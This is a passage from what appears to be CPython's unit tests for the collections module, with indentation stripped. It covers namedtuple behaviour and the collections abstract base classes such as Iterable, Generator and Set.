'f_globals', 'field', 'field_names', 'fields', 'formatted', 'frame',
'function', 'functions', 'generate', 'get', 'getter', 'got', 'greater',
'has', 'help', 'identifiers', 'index', 'indexable', 'instance',
'instantiate', 'interning', 'introspection', 'isidentifier',
'isinstance', 'itemgetter', 'iterable', 'join', 'keyword', 'keywords',
'kwds', 'len', 'like', 'list', 'map', 'maps', 'message', 'metadata',
'method', 'methods', 'module', 'module_name', 'must', 'name', 'named',
'namedtuple', 'namedtuple_', 'names', 'namespace', 'needs', 'new',
'nicely', 'num_fields', 'number', 'object', 'of', 'operator', 'option',
'p', 'particular', 'pickle', 'pickling', 'plain', 'pop', 'positional',
'property', 'r', 'regular', 'rename', 'replace', 'replacing', 'repr',
'repr_fmt', 'representation', 'result', 'reuse_itemgetter', 's', 'seen',
'self', 'sequence', 'set', 'side', 'specified', 'split', 'start',
'startswith', 'step', 'str', 'string', 'strings', 'subclass', 'sys',
'targets', 'than', 'the', 'their', 'this', 'to', 'tuple', 'tuple_new',
'type', 'typename', 'underscore', 'unexpected', 'unpack', 'up', 'use',
'used', 'user', 'valid', 'values', 'variable', 'verbose', 'where',
'which', 'work', 'x', 'y', 'z', 'zip'}
T = namedtuple('T', words)
# test __new__
values = tuple(range(len(words)))
t = T(*values)
self.assertEqual(t, values)
t = T(**dict(zip(T._fields, values)))
self.assertEqual(t, values)
# test _make
t = T._make(values)
self.assertEqual(t, values)
# exercise __repr__
repr(t)
# test _asdict
self.assertEqual(t._asdict(), dict(zip(T._fields, values)))
# test _replace
t = T._make(values)
newvalues = tuple(v*10 for v in values)
newt = t._replace(**dict(zip(T._fields, newvalues)))
self.assertEqual(newt, newvalues)
# test _fields
self.assertEqual(T._fields, tuple(words))
# test __getnewargs__
self.assertEqual(t.__getnewargs__(), values)
def test_repr(self):
A = namedtuple('A', 'x')
self.assertEqual(repr(A(1)), 'A(x=1)')
# repr should show the name of the subclass
class B(A):
pass
self.assertEqual(repr(B(1)), 'B(x=1)')
def test_keyword_only_arguments(self):
# See issue 25628
with self.assertRaises(TypeError):
NT = namedtuple('NT', ['x', 'y'], True)
NT = namedtuple('NT', ['abc', 'def'], rename=True)
self.assertEqual(NT._fields, ('abc', '_1'))
with self.assertRaises(TypeError):
NT = namedtuple('NT', ['abc', 'def'], False, True)
def test_namedtuple_subclass_issue_24931(self):
class Point(namedtuple('_Point', ['x', 'y'])):
pass
a = Point(3, 4)
self.assertEqual(a._asdict(), OrderedDict([('x', 3), ('y', 4)]))
a.w = 5
self.assertEqual(a.__dict__, {'w': 5})
@support.cpython_only
def test_field_descriptor(self):
Point = namedtuple('Point', 'x y')
p = Point(11, 22)
self.assertTrue(inspect.isdatadescriptor(Point.x))
self.assertEqual(Point.x.__get__(p), 11)
self.assertRaises(AttributeError, Point.x.__set__, p, 33)
self.assertRaises(AttributeError, Point.x.__delete__, p)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
class NewPoint(tuple):
x = pickle.loads(pickle.dumps(Point.x, proto))
y = pickle.loads(pickle.dumps(Point.y, proto))
np = NewPoint([1, 2])
self.assertEqual(np.x, 1)
self.assertEqual(np.y, 2)
def test_new_builtins_issue_43102(self):
obj = namedtuple('C', ())
new_func = obj.__new__
self.assertEqual(new_func.__globals__['__builtins__'], {})
self.assertEqual(new_func.__builtins__, {})
def test_match_args(self):
Point = namedtuple('Point', 'x y')
self.assertEqual(Point.__match_args__, ('x', 'y'))
def test_non_generic_subscript(self):
# For backward compatibility, subscription works
# on arbitrary named tuple types.
Group = collections.namedtuple('Group', 'key group')
A = Group[int, list[int]]
self.assertEqual(A.__origin__, Group)
self.assertEqual(A.__parameters__, ())
self.assertEqual(A.__args__, (int, list[int]))
a = A(1, [2])
self.assertIs(type(a), Group)
self.assertEqual(a, (1, [2]))
################################################################################
### Abstract Base Classes
################################################################################
class ABCTestCase(unittest.TestCase):
def validate_abstract_methods(self, abc, *names):
methodstubs = dict.fromkeys(names, lambda s, *args: 0)
# everything should work will all required methods are present
C = type('C', (abc,), methodstubs)
C()
# instantiation should fail if a required method is missing
for name in names:
stubs = methodstubs.copy()
del stubs[name]
C = type('C', (abc,), stubs)
self.assertRaises(TypeError, C, name)
def validate_isinstance(self, abc, name):
stub = lambda s, *args: 0
C = type('C', (object,), {'__hash__': None})
setattr(C, name, stub)
self.assertIsInstance(C(), abc)
self.assertTrue(issubclass(C, abc))
C = type('C', (object,), {'__hash__': None})
self.assertNotIsInstance(C(), abc)
self.assertFalse(issubclass(C, abc))
def validate_comparison(self, instance):
ops = ['lt', 'gt', 'le', 'ge', 'ne', 'or', 'and', 'xor', 'sub']
operators = {}
for op in ops:
name = '__' + op + '__'
operators[name] = getattr(operator, name)
class Other:
def __init__(self):
self.right_side = False
def __eq__(self, other):
self.right_side = True
return True
__lt__ = __eq__
__gt__ = __eq__
__le__ = __eq__
__ge__ = __eq__
__ne__ = __eq__
__ror__ = __eq__
__rand__ = __eq__
__rxor__ = __eq__
__rsub__ = __eq__
for name, op in operators.items():
if not hasattr(instance, name):
continue
other = Other()
op(instance, other)
self.assertTrue(other.right_side,'Right side not called for %s.%s'
% (type(instance), name))
def _test_gen():
yield
class TestOneTrickPonyABCs(ABCTestCase):
def test_Awaitable(self):
def gen():
yield
@types.coroutine
def coro():
yield
async def new_coro():
pass
class Bar:
def __await__(self):
yield
class MinimalCoro(Coroutine):
def send(self, value):
return value
def throw(self, typ, val=None, tb=None):
super().throw(typ, val, tb)
def __await__(self):
yield
non_samples = [None, int(), gen(), object()]
for x in non_samples:
self.assertNotIsInstance(x, Awaitable)
self.assertFalse(issubclass(type(x), Awaitable), repr(type(x)))
samples = [Bar(), MinimalCoro()]
for x in samples:
self.assertIsInstance(x, Awaitable)
self.assertTrue(issubclass(type(x), Awaitable))
c = coro()
# Iterable coroutines (generators with CO_ITERABLE_COROUTINE
# flag don't have '__await__' method, hence can't be instances
# of Awaitable. Use inspect.isawaitable to detect them.
self.assertNotIsInstance(c, Awaitable)
c = new_coro()
self.assertIsInstance(c, Awaitable)
c.close() # avoid RuntimeWarning that coro() was not awaited
class CoroLike: pass
Coroutine.register(CoroLike)
self.assertTrue(isinstance(CoroLike(), Awaitable))
self.assertTrue(issubclass(CoroLike, Awaitable))
CoroLike = None
support.gc_collect() # Kill CoroLike to clean-up ABCMeta cache
def test_Coroutine(self):
def gen():
yield
@types.coroutine
def coro():
yield
async def new_coro():
pass
class Bar:
def __await__(self):
yield
class MinimalCoro(Coroutine):
def send(self, value):
return value
def throw(self, typ, val=None, tb=None):
super().throw(typ, val, tb)
def __await__(self):
yield
non_samples = [None, int(), gen(), object(), Bar()]
for x in non_samples:
self.assertNotIsInstance(x, Coroutine)
self.assertFalse(issubclass(type(x), Coroutine), repr(type(x)))
samples = [MinimalCoro()]
for x in samples:
self.assertIsInstance(x, Awaitable)
self.assertTrue(issubclass(type(x), Awaitable))
c = coro()
# Iterable coroutines (generators with CO_ITERABLE_COROUTINE
# flag don't have '__await__' method, hence can't be instances
# of Coroutine. Use inspect.isawaitable to detect them.
self.assertNotIsInstance(c, Coroutine)
c = new_coro()
self.assertIsInstance(c, Coroutine)
c.close() # avoid RuntimeWarning that coro() was not awaited
class CoroLike:
def send(self, value):
pass
def throw(self, typ, val=None, tb=None):
pass
def close(self):
pass
def __await__(self):
pass
self.assertTrue(isinstance(CoroLike(), Coroutine))
self.assertTrue(issubclass(CoroLike, Coroutine))
class CoroLike:
def send(self, value):
pass
def close(self):
pass
def __await__(self):
pass
self.assertFalse(isinstance(CoroLike(), Coroutine))
self.assertFalse(issubclass(CoroLike, Coroutine))
def test_Hashable(self):
# Check some non-hashables
non_samples = [bytearray(), list(), set(), dict()]
for x in non_samples:
self.assertNotIsInstance(x, Hashable)
self.assertFalse(issubclass(type(x), Hashable), repr(type(x)))
# Check some hashables
samples = [None,
int(), float(), complex(),
str(),
tuple(), frozenset(),
int, list, object, type, bytes()
]
for x in samples:
self.assertIsInstance(x, Hashable)
self.assertTrue(issubclass(type(x), Hashable), repr(type(x)))
self.assertRaises(TypeError, Hashable)
# Check direct subclassing
class H(Hashable):
def __hash__(self):
return super().__hash__()
self.assertEqual(hash(H()), 0)
self.assertFalse(issubclass(int, H))
self.validate_abstract_methods(Hashable, '__hash__')
self.validate_isinstance(Hashable, '__hash__')
def test_AsyncIterable(self):
class AI:
def __aiter__(self):
return self
self.assertTrue(isinstance(AI(), AsyncIterable))
self.assertTrue(issubclass(AI, AsyncIterable))
# Check some non-iterables
non_samples = [None, object, []]
for x in non_samples:
self.assertNotIsInstance(x, AsyncIterable)
self.assertFalse(issubclass(type(x), AsyncIterable), repr(type(x)))
self.validate_abstract_methods(AsyncIterable, '__aiter__')
self.validate_isinstance(AsyncIterable, '__aiter__')
def test_AsyncIterator(self):
class AI:
def __aiter__(self):
return self
async def __anext__(self):
raise StopAsyncIteration
self.assertTrue(isinstance(AI(), AsyncIterator))
self.assertTrue(issubclass(AI, AsyncIterator))
non_samples = [None, object, []]
# Check some non-iterables
for x in non_samples:
self.assertNotIsInstance(x, AsyncIterator)
self.assertFalse(issubclass(type(x), AsyncIterator), repr(type(x)))
# Similarly to regular iterators (see issue 10565)
class AnextOnly:
async def __anext__(self):
raise StopAsyncIteration
self.assertNotIsInstance(AnextOnly(), AsyncIterator)
self.validate_abstract_methods(AsyncIterator, '__anext__', '__aiter__')
def test_Iterable(self):
# Check some non-iterables
non_samples = [None, 42, 3.14, 1j]
for x in non_samples:
self.assertNotIsInstance(x, Iterable)
self.assertFalse(issubclass(type(x), Iterable), repr(type(x)))
# Check some iterables
samples = [bytes(), str(),
tuple(), list(), set(), frozenset(), dict(),
dict().keys(), dict().items(), dict().values(),
_test_gen(),
(x for x in []),
]
for x in samples:
self.assertIsInstance(x, Iterable)
self.assertTrue(issubclass(type(x), Iterable), repr(type(x)))
# Check direct subclassing
class I(Iterable):
def __iter__(self):
return super().__iter__()
self.assertEqual(list(I()), [])
self.assertFalse(issubclass(str, I))
self.validate_abstract_methods(Iterable, '__iter__')
self.validate_isinstance(Iterable, '__iter__')
# Check None blocking
class It:
def __iter__(self): return iter([])
class ItBlocked(It):
__iter__ = None
self.assertTrue(issubclass(It, Iterable))
self.assertTrue(isinstance(It(), Iterable))
self.assertFalse(issubclass(ItBlocked, Iterable))
self.assertFalse(isinstance(ItBlocked(), Iterable))
def test_Reversible(self):
# Check some non-reversibles
non_samples = [None, 42, 3.14, 1j, set(), frozenset()]
for x in non_samples:
self.assertNotIsInstance(x, Reversible)
self.assertFalse(issubclass(type(x), Reversible), repr(type(x)))
# Check some non-reversible iterables
non_reversibles = [_test_gen(), (x for x in []), iter([]), reversed([])]
for x in non_reversibles:
self.assertNotIsInstance(x, Reversible)
self.assertFalse(issubclass(type(x), Reversible), repr(type(x)))
# Check some reversible iterables
samples = [bytes(), str(), tuple(), list(), OrderedDict(),
OrderedDict().keys(), OrderedDict().items(),
OrderedDict().values(), Counter(), Counter().keys(),
Counter().items(), Counter().values(), dict(),
dict().keys(), dict().items(), dict().values()]
for x in samples:
self.assertIsInstance(x, Reversible)
self.assertTrue(issubclass(type(x), Reversible), repr(type(x)))
# Check also Mapping, MutableMapping, and Sequence
self.assertTrue(issubclass(Sequence, Reversible), repr(Sequence))
self.assertFalse(issubclass(Mapping, Reversible), repr(Mapping))
self.assertFalse(issubclass(MutableMapping, Reversible), repr(MutableMapping))
# Check direct subclassing
class R(Reversible):
def __iter__(self):
return iter(list())
def __reversed__(self):
return iter(list())
self.assertEqual(list(reversed(R())), [])
self.assertFalse(issubclass(float, R))
self.validate_abstract_methods(Reversible, '__reversed__', '__iter__')
# Check reversible non-iterable (which is not Reversible)
class RevNoIter:
def __reversed__(self): return reversed([])
class RevPlusIter(RevNoIter):
def __iter__(self): return iter([])
self.assertFalse(issubclass(RevNoIter, Reversible))
self.assertFalse(isinstance(RevNoIter(), Reversible))
self.assertTrue(issubclass(RevPlusIter, Reversible))
self.assertTrue(isinstance(RevPlusIter(), Reversible))
# Check None blocking
class Rev:
def __iter__(self): return iter([])
def __reversed__(self): return reversed([])
class RevItBlocked(Rev):
__iter__ = None
class RevRevBlocked(Rev):
__reversed__ = None
self.assertTrue(issubclass(Rev, Reversible))
self.assertTrue(isinstance(Rev(), Reversible))
self.assertFalse(issubclass(RevItBlocked, Reversible))
self.assertFalse(isinstance(RevItBlocked(), Reversible))
self.assertFalse(issubclass(RevRevBlocked, Reversible))
self.assertFalse(isinstance(RevRevBlocked(), Reversible))
def test_Collection(self):
# Check some non-collections
non_collections = [None, 42, 3.14, 1j, lambda x: 2*x]
for x in non_collections:
self.assertNotIsInstance(x, Collection)
self.assertFalse(issubclass(type(x), Collection), repr(type(x)))
# Check some non-collection iterables
non_col_iterables = [_test_gen(), iter(b''), iter(bytearray()),
(x for x in [])]
for x in non_col_iterables:
self.assertNotIsInstance(x, Collection)
self.assertFalse(issubclass(type(x), Collection), repr(type(x)))
# Check some collections
samples = [set(), frozenset(), dict(), bytes(), str(), tuple(),
list(), dict().keys(), dict().items(), dict().values()]
for x in samples:
self.assertIsInstance(x, Collection)
self.assertTrue(issubclass(type(x), Collection), repr(type(x)))
# Check also Mapping, MutableMapping, etc.
self.assertTrue(issubclass(Sequence, Collection), repr(Sequence))
self.assertTrue(issubclass(Mapping, Collection), repr(Mapping))
self.assertTrue(issubclass(MutableMapping, Collection),
repr(MutableMapping))
self.assertTrue(issubclass(Set, Collection), repr(Set))
self.assertTrue(issubclass(MutableSet, Collection), repr(MutableSet))
self.assertTrue(issubclass(Sequence, Collection), repr(MutableSet))
# Check direct subclassing
class Col(Collection):
def __iter__(self):
return iter(list())
def __len__(self):
return 0
def __contains__(self, item):
return False
class DerCol(Col): pass
self.assertEqual(list(iter(Col())), [])
self.assertFalse(issubclass(list, Col))
self.assertFalse(issubclass(set, Col))
self.assertFalse(issubclass(float, Col))
self.assertEqual(list(iter(DerCol())), [])
self.assertFalse(issubclass(list, DerCol))
self.assertFalse(issubclass(set, DerCol))
self.assertFalse(issubclass(float, DerCol))
self.validate_abstract_methods(Collection, '__len__', '__iter__',
'__contains__')
# Check sized container non-iterable (which is not Collection) etc.
class ColNoIter:
def __len__(self): return 0
def __contains__(self, item): return False
class ColNoSize:
def __iter__(self): return iter([])
def __contains__(self, item): return False
class ColNoCont:
def __iter__(self): return iter([])
def __len__(self): return 0
self.assertFalse(issubclass(ColNoIter, Collection))
self.assertFalse(isinstance(ColNoIter(), Collection))
self.assertFalse(issubclass(ColNoSize, Collection))
self.assertFalse(isinstance(ColNoSize(), Collection))
self.assertFalse(issubclass(ColNoCont, Collection))
self.assertFalse(isinstance(ColNoCont(), Collection))
# Check None blocking
class SizeBlock:
def __iter__(self): return iter([])
def __contains__(self): return False
__len__ = None
class IterBlock:
def __len__(self): return 0
def __contains__(self): return True
__iter__ = None
self.assertFalse(issubclass(SizeBlock, Collection))
self.assertFalse(isinstance(SizeBlock(), Collection))
self.assertFalse(issubclass(IterBlock, Collection))
self.assertFalse(isinstance(IterBlock(), Collection))
# Check None blocking in subclass
class ColImpl:
def __iter__(self):
return iter(list())
def __len__(self):
return 0
def __contains__(self, item):
return False
class NonCol(ColImpl):
__contains__ = None
self.assertFalse(issubclass(NonCol, Collection))
self.assertFalse(isinstance(NonCol(), Collection))
def test_Iterator(self):
non_samples = [None, 42, 3.14, 1j, b"", "", (), [], {}, set()]
for x in non_samples:
self.assertNotIsInstance(x, Iterator)
self.assertFalse(issubclass(type(x), Iterator), repr(type(x)))
samples = [iter(bytes()), iter(str()),
iter(tuple()), iter(list()), iter(dict()),
iter(set()), iter(frozenset()),
iter(dict().keys()), iter(dict().items()),
iter(dict().values()),
_test_gen(),
(x for x in []),
]
for x in samples:
self.assertIsInstance(x, Iterator)
self.assertTrue(issubclass(type(x), Iterator), repr(type(x)))
self.validate_abstract_methods(Iterator, '__next__', '__iter__')
# Issue 10565
class NextOnly:
def __next__(self):
yield 1
return
self.assertNotIsInstance(NextOnly(), Iterator)
def test_Generator(self):
class NonGen1:
def __iter__(self): return self
def __next__(self): return None
def close(self): pass
def throw(self, typ, val=None, tb=None): pass
class NonGen2:
def __iter__(self): return self
def __next__(self): return None
def close(self): pass
def send(self, value): return value
class NonGen3:
def close(self): pass
def send(self, value): return value
def throw(self, typ, val=None, tb=None): pass
non_samples = [
None, 42, 3.14, 1j, b"", "", (), [], {}, set(),
iter(()), iter([]), NonGen1(), NonGen2(), NonGen3()]
for x in non_samples:
self.assertNotIsInstance(x, Generator)
self.assertFalse(issubclass(type(x), Generator), repr(type(x)))
class Gen:
def __iter__(self): return self
def __next__(self): return None
def close(self): pass
def send(self, value): return value
def throw(self, typ, val=None, tb=None): pass
class MinimalGen(Generator):
def send(self, value):
return value
def throw(self, typ, val=None, tb=None):
super().throw(typ, val, tb)
def gen():
yield 1
samples = [gen(), (lambda: (yield))(), Gen(), MinimalGen()]
for x in samples:
self.assertIsInstance(x, Iterator)
self.assertIsInstance(x, Generator)
self.assertTrue(issubclass(type(x), Generator), repr(type(x)))
self.validate_abstract_methods(Generator, 'send', 'throw')
# mixin tests
mgen = MinimalGen()
self.assertIs(mgen, iter(mgen))
self.assertIs(mgen.send(None), next(mgen))
self.assertEqual(2, mgen.send(2))
self.assertIsNone(mgen.close())
self.assertRaises(ValueError, mgen.throw, ValueError)
self.assertRaisesRegex(ValueError, "^huhu$",
mgen.throw, ValueError, ValueError("huhu"))
self.assertRaises(StopIteration, mgen.throw, StopIteration())
class FailOnClose(Generator):
def send(self, value): return value
def throw(self, *args): raise ValueError
self.assertRaises(ValueError, FailOnClose().close)
class IgnoreGeneratorExit(Generator):
def send(self, value): return value
def throw(self, *args): pass
self.assertRaises(RuntimeError, IgnoreGeneratorExit().close)
def test_AsyncGenerator(self):
class NonAGen1:
def __aiter__(self): return self
def __anext__(self): return None
def aclose(self): pass
def athrow(self, typ, val=None, tb=None): pass
class NonAGen2:
def __aiter__(self): return self
def __anext__(self): return None
def aclose(self): pass
def asend(self, value): return value
class NonAGen3:
def aclose(self): pass
def asend(self, value): return value
def athrow(self, typ, val=None, tb=None): pass
non_samples = [
None, 42, 3.14, 1j, b"", "", (), [], {}, set(),
iter(()), iter([]), NonAGen1(), NonAGen2(), NonAGen3()]
for x in non_samples:
self.assertNotIsInstance(x, AsyncGenerator)
self.assertFalse(issubclass(type(x), AsyncGenerator), repr(type(x)))
class Gen:
def __aiter__(self): return self
async def __anext__(self): return None
async def aclose(self): pass
async def asend(self, value): return value
async def athrow(self, typ, val=None, tb=None): pass
class MinimalAGen(AsyncGenerator):
async def asend(self, value):
return value
async def athrow(self, typ, val=None, tb=None):
await super().athrow(typ, val, tb)
async def gen():
yield 1
samples = [gen(), Gen(), MinimalAGen()]
for x in samples:
self.assertIsInstance(x, AsyncIterator)
self.assertIsInstance(x, AsyncGenerator)
self.assertTrue(issubclass(type(x), AsyncGenerator), repr(type(x)))
self.validate_abstract_methods(AsyncGenerator, 'asend', 'athrow')
def run_async(coro):
result = None
while True:
try:
coro.send(None)
except StopIteration as ex:
result = ex.args[0] if ex.args else None
break
return result
# mixin tests
mgen = MinimalAGen()
self.assertIs(mgen, mgen.__aiter__())
self.assertIs(run_async(mgen.asend(None)), run_async(mgen.__anext__()))
self.assertEqual(2, run_async(mgen.asend(2)))
self.assertIsNone(run_async(mgen.aclose()))
with self.assertRaises(ValueError):
run_async(mgen.athrow(ValueError))
class FailOnClose(AsyncGenerator):
async def asend(self, value): return value
async def athrow(self, *args): raise ValueError
with self.assertRaises(ValueError):
run_async(FailOnClose().aclose())
class IgnoreGeneratorExit(AsyncGenerator):
async def asend(self, value): return value
async def athrow(self, *args): pass
with self.assertRaises(RuntimeError):
run_async(IgnoreGeneratorExit().aclose())
def test_Sized(self):
non_samples = [None, 42, 3.14, 1j,
_test_gen(),
(x for x in []),
]
for x in non_samples:
self.assertNotIsInstance(x, Sized)
self.assertFalse(issubclass(type(x), Sized), repr(type(x)))
samples = [bytes(), str(),
tuple(), list(), set(), frozenset(), dict(),
dict().keys(), dict().items(), dict().values(),
]
for x in samples:
self.assertIsInstance(x, Sized)
self.assertTrue(issubclass(type(x), Sized), repr(type(x)))
self.validate_abstract_methods(Sized, '__len__')
self.validate_isinstance(Sized, '__len__')
def test_Container(self):
non_samples = [None, 42, 3.14, 1j,
_test_gen(),
(x for x in []),
]
for x in non_samples:
self.assertNotIsInstance(x, Container)
self.assertFalse(issubclass(type(x), Container), repr(type(x)))
samples = [bytes(), str(),
tuple(), list(), set(), frozenset(), dict(),
dict().keys(), dict().items(),
]
for x in samples:
self.assertIsInstance(x, Container)
self.assertTrue(issubclass(type(x), Container), repr(type(x)))
self.validate_abstract_methods(Container, '__contains__')
self.validate_isinstance(Container, '__contains__')
def test_Callable(self):
non_samples = [None, 42, 3.14, 1j,
"", b"", (), [], {}, set(),
_test_gen(),
(x for x in []),
]
for x in non_samples:
self.assertNotIsInstance(x, Callable)
self.assertFalse(issubclass(type(x), Callable), repr(type(x)))
samples = [lambda: None,
type, int, object,
len,
list.append, [].append,
]
for x in samples:
self.assertIsInstance(x, Callable)
self.assertTrue(issubclass(type(x), Callable), repr(type(x)))
self.validate_abstract_methods(Callable, '__call__')
self.validate_isinstance(Callable, '__call__')
def test_direct_subclassing(self):
for B in Hashable, Iterable, Iterator, Reversible, Sized, Container, Callable:
class C(B):
pass
self.assertTrue(issubclass(C, B))
self.assertFalse(issubclass(int, C))
def test_registration(self):
for B in Hashable, Iterable, Iterator, Reversible, Sized, Container, Callable:
class C:
__hash__ = None # Make sure it isn't hashable by default
self.assertFalse(issubclass(C, B), B.__name__)
B.register(C)
self.assertTrue(issubclass(C, B))
class WithSet(MutableSet):
def __init__(self, it=()):
self.data = set(it)
def __len__(self):
return len(self.data)
def __iter__(self):
return iter(self.data)
def __contains__(self, item):
return item in self.data
def add(self, item):
self.data.add(item)
def discard(self, item):
self.data.discard(item)
class TestCollectionABCs(ABCTestCase):
# XXX For now, we only test some virtual inheritance properties.
# We should also test the proper behavior of the collection ABCs
# as real base classes or mix-in classes.
def test_Set(self):
for sample in [set, frozenset]:
self.assertIsInstance(sample(), Set)
self.assertTrue(issubclass(sample, Set))
self.validate_abstract_methods(Set, '__contains__', '__iter__', '__len__')
class MySet(Set):
def __contains__(self, x):
return False
def __len__(self):
return 0
def __iter__(self):
return iter([])
self.validate_comparison(MySet())
def test_hash_Set(self):
class OneTwoThreeSet(Set):
def __init__(self):
self.contents = [1, 2, 3]
def __contains__(self, x):
return x in self.contents
def __len__(self):
return len(self.contents)
def __iter__(self):
return iter(self.contents)
def __hash__(self):
return self._hash()
a, b = OneTwoThreeSet(), OneTwoThreeSet()
self.assertTrue(hash(a) == hash(b))
def test_isdisjoint_Set(self):
class MySet(Set):
def __init__(self, itr):
self.contents = itr
def __contains__(self, x):
return x in self.contents
def __iter__(self):
return iter(self.contents)
def __len__(self):
return len([x for x in self.contents])
s1 = MySet((1, 2, 3))
s2 = MySet((4, 5, 6))
s3 = MySet((1, 5, 6))
self.assertTrue(s1.isdisjoint(s2))
self.assertFalse(s1.isdisjoint(s3))
def test_equality_Set(self):
class MySet(Set):
def __init__(self, itr):
self.contents = itr
def __contains__(self, x):
return x in self.contents
def __iter__(self):
return iter(self.contents)
def __len__(self):
return len([x for x in self.contents])
s1 = MySet((1,))
s2 = MySet((1, 2))
s3 = MySet((3, 4))
s4 = MySet((3, 4))
self.assertTrue(s2 > s1)
self.assertTrue(s1 < s2)
self.assertFalse(s2 <= s1)
self.assertFalse(s2 <= s3)
self.assertFalse(s1 >= s2)
self.assertEqual(s3, s4)
self.assertNotEqual(s2, s3)
def test_arithmetic_Set(self):
class MySet(Set):
def __init__(self, itr):
self.contents = itr
def __contains__(self, x):
return x in self.contents
def __iter__(self):
return iter(self.contents)
def __len__(self):
return len([x for x in self.contents])
s1 = MySet((1, 2, 3))
s2 = MySet((3, 4, 5))
s3 = s1 & s2
self.assertEqual(s3, MySet((3,)))
def test_MutableSet(self):
self.assertIsInstance(set(), MutableSet)
self.assertTrue(issubclass(set, MutableSet))
self.assertNotIsInstance(frozenset(), MutableSet)
self.assertFalse(issubclass(frozenset, MutableSet))
self.validate_abstract_methods(MutableSet, '__contains__', '__iter__', '__len__',
'add', 'discard')
def test_issue_5647(self):
# MutableSet.__iand__ mutated the set during iteration
s = WithSet('abcd')
s &= WithSet('cdef') # This used to fail
self.assertEqual(set(s), set('cd'))
def test_issue_4920(self):
# MutableSet.pop() method did not work
class MySet(MutableSet):
__slots__=['__s']
def __init__(self,items=None):
if items is None:
items=[]
self.__s=set(items)
def __contains__(self,v):
return v in self.__s
def __iter__(self):
return iter(self.__s)
def __len__(self):
return len(self.__s)
def add(self,v):
result=v not in self.__s
self.__s.add(v)
return result
def discard(self,v):
result=v in self.__s
self.__s.discard(v)
return result
def __repr__(self):
return "MySet(%s)" % repr(list(self))
items = [5,43,2,1]
s = MySet(items)
r = s.pop()
self.assertEqual(len(s), len(items) - 1)
self.assertNotIn(r, s)
self.assertIn(r, items)
def test_issue8750(self):
empty = WithSet()
full = WithSet(range(10))
s = WithSet(full)
s -= s
self.assertEqual(s, empty)
s = WithSet(full)
s ^= s
self.assertEqual(s, empty)
s = WithSet(full)
s &= s
self.assertEqual(s, full)
s |= s
self.assertEqual(s, full)
def test_issue16373(self):
# Recursion error comparing comparable and noncomparable
# Set instances
class MyComparableSet(Set):
def __contains__(self, x):
return False
def __len__(self):
return 0
def __iter__(self):
return iter([])
class MyNonComparableSet(Set):
def __contains__(self, x):
return False
def __len__(self):
return 0
def __iter__(self):
return iter([])
def __le__(self, x):
return NotImplemented
def __lt__(self, x):
return NotImplemented
cs = MyComparableSet()
ncs = MyNonComparableSet()
self.assertFalse(ncs < cs)
self.assertTrue(ncs <= cs)
self.assertFalse(ncs > cs)
self.assertTrue(ncs >= cs)
def test_issue26915(self):
# Container membership test should check identity first
class CustomSequence(Sequence):
def __init__(self, seq):
self._seq = seq
def __getitem__(self, index):
return self._seq[index]
def __len__(self):
return len(self._seq)
nan = float('nan')
obj = support.NEVER_EQ
seq = CustomSequence([nan, obj, nan])
containers = [
seq,
ItemsView({1: nan, 2: obj}),
ValuesView({1: nan, 2: obj})
]
for container in containers:
for elem in container:
self.assertIn(elem, container)
self.assertEqual(seq.index(nan), 0)
self.assertEqual(seq.index(obj), 1)
self.assertEqual(seq.count(nan), 2)
self.assertEqual(seq.count(obj), 1)
def assertSameSet(self, s1, s2):
# coerce both to a real set then check equality
self.assertSetEqual(set(s1), set(s2))
def test_Set_from_iterable(self):
"""Verify _from_iterable overridden to an instance method works."""
class SetUsingInstanceFromIterable(MutableSet):
def __init__(self, values, created_by):
if not created_by:
raise ValueError(f'created_by must be specified')
self.created_by = created_by
self._values = set(values)
def _from_iterable(self, values):
return type(self)(values, 'from_iterable')
def __contains__(self, value):
return value in self._values
def __iter__(self):
yield from self._values
def __len__(self):
return len(self._values)
def add(self, value):
self._values.add(value)
def discard(self, value):
self._values.discard(value)
impl = SetUsingInstanceFromIterable([1, 2, 3], 'test')
actual = impl - {1}
self.assertIsInstance(actual, SetUsingInstanceFromIterable)
self.assertEqual('from_iterable', actual.created_by)
self.assertEqual({2, 3}, actual)
actual = impl | {4}
self.assertIsInstance(actual, SetUsingInstanceFromIterable)
self.assertEqual('from_iterable', actual.created_by)
self.assertEqual({1, 2, 3, 4}, actual)
actual = impl & {2}
self.assertIsInstance(actual, SetUsingInstanceFromIterable)
self.assertEqual('from_iterable', actual.created_by)
self.assertEqual({2}, actual)
actual = impl ^ {3, 4}
self.assertIsInstance(actual, SetUsingInstanceFromIterable)
self.assertEqual('from_iterable', actual.created_by)
self.assertEqual({1, 2, 4}, actual)
# NOTE: ixor'ing with a list is important here: internally, __ixor__
# only calls _from_iterable if the other value isn't already a Set.
impl ^= [3, 4]
self.assertIsInstance(impl, SetUsingInstanceFromIterable)
self.assertEqual('test', impl.created_by)
self.assertEqual({1, 2, 4}, impl)
def test_Set_interoperability_with_real_sets(self):
# Issue: 8743
class ListSet(Set):
def __init__(self, elements=()):
self.data = []
for elem in elements:
if elem not in self.data:
self.data.append(elem)
def __contains__(self, elem):
return elem in self.data
def __iter__(self):
return iter(self.data)
def __len__(self):
return len(self.data)
def __repr__(self):
return 'Set({!r})'.format(self.data)
r1 = set('abc')
r2 = set('bcd')
r3 = set('abcde')
f1 = ListSet('abc')
f2 = ListSet('bcd')
f3 = ListSet('abcde')
l1 = list('abccba')
l2 = list('bcddcb')
l3 = list('abcdeedcba')
target = r1 & r2
self.assertSameSet(f1 & f2, target)
self.assertSameSet(f1 & r2, target)
self.assertSameSet(r2 & f1, target)
self.assertSameSet(f1 & l2, target)
target = r1 | r2
self.assertSameSet(f1 | f2, target)
self.assertSameSet(f1 | r2, target)
self.assertSameSet(r2 | f1, target)
self.assertSameSet(f1 | l2, target)
fwd_target = r1 - r2
rev_target = r2 - r1
self.assertSameSet(f1 - f2, fwd_target)
self.assertSameSet(f2 - f1, rev_target)
self.assertSameSet(f1 - r2, fwd_target)
self.assertSameSet(f2 - r1, rev_target)
self.assertSameSet(r1 - f2, fwd_target)
self.assertSameSet(r2 - f1, rev_target)
self.assertSameSet(f1 - l2, fwd_target)
self.assertSameSet(f2 - l1, rev_target)
target = r1 ^ r2
self.assertSameSet(f1 ^ f2, target)
self.assertSameSet(f1 ^ r2, target)
self.assertSameSet(r2 ^ f1, target)
self.assertSameSet(f1 ^ l2, target)
# Don't change the following to use assertLess or other
# "more specific" unittest assertions. The current
# assertTrue/assertFalse style makes the pattern of test
# case combinations clear and allows us to know for sure
# the exact operator being invoked.
# proper subset
self.assertTrue(f1 < f3)
self.assertFalse(f1 < f1)
